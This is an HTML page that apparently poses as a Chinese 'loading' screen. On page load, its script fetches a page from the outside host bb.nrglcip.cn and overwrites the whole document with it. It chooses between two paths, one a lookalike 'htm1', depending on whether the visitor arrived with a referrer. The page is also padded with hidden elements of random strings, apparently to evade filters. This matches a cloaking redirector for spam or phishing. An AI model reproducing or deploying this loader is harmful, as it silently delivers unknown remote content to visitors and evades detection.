<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Ll9mAak {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Ll9mAak .dmDHlmKI {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Ll9mAak .content {
            line-height: 50px;
            text-align: center
        }

        .Ll9mAak .img {
            width: 100%
        }

        .Ll9mAak .TjsYENrDX {
            text-align: center
        }

        .Ll9mAak .TjsYENrDX span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Ll9mAak .TjsYENrDX span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Ll9mAak .TjsYENrDX span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Ll9mAak .TjsYENrDX span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Ll9mAak .TjsYENrDX span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Ll9mAak .TjsYENrDX span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Ll9mAak .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function n9dlQxQbHg(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var LtwcmFb = n9dlQxQbHg('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ LtwcmFb +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ LtwcmFb +".html?a=share";
		}
		
        dlqmRajA6=url+"#"+new Date().getTime();
        dlqmRajA6 && function() {
            $.get(dlqmRajA6, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >qtsLQkZE9XXQHW88w5Ug7XHzzoRqP15ecQeBXiD9wCCxx83aS</h1>
<div style='display:none'>b1D3X46XlWiF2dU3by2oh6Xo4ZVNbij2QvJrlWRpHFirN3zEMsr4gfaJ9bDWywQnd3jvTaXARZoFnog</div>
<b style='display:none' >GRiG69pXNgHuakeUB1OC9cpcAwI6DRj8pcREYTp9E5ugT2WWX6486jmB0OKEqzTqd0GrmnNUsFE9BxIow</b>
<span style='display:none'>DF5XZUkzpsbF9We9KArFJZHszNLyvzLzyi9QFoo7PdOZhX2RUWb1SGPGiNHm8oysQkYoNg2Ael9OivGE4SxC7W0</span>
<a  href='#' style='display:none'>imB0aztc689bY11a9WlBoOMoU</a>
<h1 style='display:none' >qtsLQkZE9XXQHW88w5Ug7XHzzoRqP15ecQeBXiD9wCCxx83aS</h1><div class="Ll9mAak">
    <div class="dmDHlmKI">
        <div class="TjsYENrDX">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >uYl9kNdNjjwc7jkiDvgdzcuEbyMPbMOewnt3AL</h1>
<ul style='display:none' >B1wq41nT2kwxZUtskJIvyZtY4uVreybYu3GaYXNRxisGAsGP06yFZCrqRyhZCziIj0B</ul>
<span style='display:none'>alpDCdwx8gm6mCajRisLj0BAq3</span>
<p  style='display:none'>zH4VJ3W0fJblT69sKiKoxzXXwfbeHzgIWZHl9sGqnIYfmcPOTVAHFpsfyx5WVVu87VcVRSO2L4bQ2E5H5j2F</p>
<p  style='display:none'>zH4VJ3W0fJblT69sKiKoxzXXwfbeHzgIWZHl9sGqnIYfmcPOTVAHFpsfyx5WVVu87VcVRSO2L4bQ2E5H5j2F</p></body>
</html>